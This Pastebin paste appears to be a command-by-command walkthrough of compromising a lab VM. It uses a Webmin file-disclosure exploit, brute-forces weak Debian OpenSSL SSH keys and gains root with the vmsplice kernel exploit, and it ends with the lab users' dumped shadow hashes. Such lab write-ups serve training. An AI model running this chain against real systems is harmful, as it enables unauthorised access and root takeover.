SHARE
TWEET

g0tmi1k

a guest Apr 1st, 2010 3,150 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. nmap 192.168.3.1-255
  2.  
  3. nmap -sV -sS -O 192.168.3.100
  4.  
  5. firefox http://192.168.3.100
  6.  
  7. firefox http://192.168.3.100:10000
  8.  
  9.  
  10. firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
  11. *Webmin <> save. Filename: shadow
  12.  
  13. firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
  14. *Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
  15. http://milw0rm.com/exploits/5622        (perl)
  16. http://milw0rm.com/exploits/5720        (python)
  17. http://milw0rm.com/exploits/5632        (ruby)
  18. http://www.exploit-db.com/exploits/5622 (perl)
  19. http://www.exploit-db.com/exploits/5720 (python)
  20. http://www.exploit-db.com/exploits/5632 (ruby)
  21.  
  22. wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
  23.  
  24. perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
  25. perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
  26. perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
  27. perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
  28.  
  29. tar jxvf debian_ssh_rsa_2048_x86.tar.bz
  30.  
  31. cd rsa/2048
  32.  
  33. grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
  34. grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
  35. *scans for the public key...*
  36.  
  37. ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
  38. exit
  39.  
  40. ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
  41. hostname
  42. uname -a
  43.  
  44. firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
  45. *Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
  46. http://milw0rm.com/exploits/5092         (c)
  47. http://www.exploit-db.com/exploits/5092  (c)
  48.  
  49. nano vmsplice.c
  50.  
  51. gcc vmsplice.c -o vmsplice
  52.  
  53. ./vmsplice
  54.  
  55. whoami
  56.  
  57.  
  58.  
  59. ----------------------------------------------------------------------------------------------------
  60. Users
  61. root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
  62. vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
  63. obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
  64. osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
  65. yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
  66. ----------------------------------------------------------------------------------------------------
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top